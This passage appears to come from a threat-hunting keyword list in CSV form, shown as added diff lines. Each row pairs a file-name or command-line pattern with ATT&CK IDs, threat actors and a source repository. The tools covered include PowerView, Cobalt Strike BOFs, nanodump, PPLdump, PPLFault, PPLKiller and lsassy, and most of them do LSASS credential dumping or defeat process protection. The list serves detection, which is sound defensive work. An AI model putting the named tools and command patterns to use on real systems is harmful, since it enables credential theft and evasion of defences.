+"*PowerView.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. 
including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*PowerView_dev.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*PowerView3-Aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
+"*ppajinakbfocjfnijggfndbdmjggcmde*","greyware_tool_keyword","My Browser Vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*ppenum.c*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*ppenum.exe*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*ppenum.x64.*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*ppenum.x86.*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*ppl* --elevate-handle 
*.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*ppl_dump.x64*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*ppl_medic_dll.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*PPLBlade.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*PPLBlade.exe*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*PPLBlade-main.*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*ppldump *","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*PPLdump*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
+"*PPLdump.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
+"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*PPLDump_BOF.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the 
key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*PPLdump64.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
+"*PPLdumpDll*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 
- TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*pplfault.cna*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultDumpBOF*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - 
T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultTemp*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - 
T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PppEWCIgXbsepIwnuRIHtQLC*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*praetorian.antihacker*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*praetorian-inc/gato*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - 
T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*praetorian-inc/noseyparker*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*praetorian-inc/PortBender*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*pre2k auth * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*prepare_ppl_command_line*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" 
+"*PrimusC2-main.zip*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*print_shtinkering_crash_location*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*printerbug.py *:*@* *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PrinterNotifyPotato *","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*PrinterNotifyPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*PrintNightmare.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
